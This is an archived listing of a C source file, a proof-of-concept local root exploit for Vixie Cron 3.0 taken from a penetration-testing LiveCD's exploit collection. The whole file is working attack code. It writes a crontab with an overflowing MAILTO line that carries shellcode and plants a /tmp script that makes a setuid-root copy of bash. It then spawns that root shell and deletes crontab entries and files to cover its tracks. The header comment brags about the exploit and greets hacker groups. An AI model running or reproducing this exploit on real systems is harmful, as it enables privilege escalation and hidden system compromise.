home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / w00w00crond.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  80 lines
  1. /*
  2.  * VixieCron 3.0 Proof of Concept Exploit - w00w00
  3.  * 
  4.  * Not only does Paul give up root with this one, but with his creative use of
  5.  * strtok() he actually ends up putting the address of our shellcode in eip.  
  6.  * 
  7.  * Many Thanks: Cheez Wiz, Sangfroid
  8.  * Thanks: stran9er, Shok
  9.  * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
  10.  * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
  11.  *        defacement group here>
  12.  *        
  13.  * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
  14.  * 
  15.  * -jbowie@el8.org
  16.  * 
  17.  */
  18.    
  19. #include <stdio.h>
  20. #include <sys/types.h>
  21. #include <sys/stat.h>
  22. #include <unistd.h>
  23. #include <pwd.h>
  24.  
  25. char shellcode[] =
  26.         "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
  27.         "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
  28.         "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
  29.         "\xff/tmp/w00w00";
  30.         
  31. int     
  32. main(int argc,char *argv[])
  33.  
  34.         FILE *cfile,*tmpfile;
  35.         struct stat sbuf;
  36.         struct passwd *pw;
  37.         int x;
  38.         
  39.         pw = getpwuid(getuid());
  40.         
  41.         chdir(pw->pw_dir);
  42.         cfile = fopen("./cronny","a+");
  43.         tmpfile = fopen("/tmp/w00w00","a+");
  44.         
  45.         fprintf(cfile,"MAILTO=");
  46.         for(x=0;x<96;x++)
  47.                 fprintf(cfile,"w00w00 ");
  48.         fprintf(cfile,"%s",shellcode);
  49.         fprintf(cfile,"\n* * * * * date\n");
  50.         fflush(cfile);
  51.  
  52.         fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
  53.         fflush(tmpfile);
  54.           
  55.         fclose(cfile),fclose(tmpfile);
  56.    
  57.         chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
  58.    
  59.         if(!(fork())) {
  60.                 execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
  61.         } else {  
  62.                 printf("Waiting for shell be patient....\n");
  63.                 for(;;) {
  64.                         if(!(stat("./bash",&sbuf))) {
  65.                                         break;
  66.                         } else { sleep(5); }
  67.                 } 
  68.                 if((fork())) {
  69.                         printf("Thank you for using w00warez!\n");
  70.                         execl("./bash","bash",(char *)0);
  71.                 } else {  
  72.                         remove("/tmp/w00w00");
  73.                         sleep(5);
  74.                         remove("./bash");
  75.                         remove("./cronny");
  76.                         execl("/usr/bin/crontab","crontab","-r",(char *)0);
  77.                 }
  78.         }
  79. }
  80.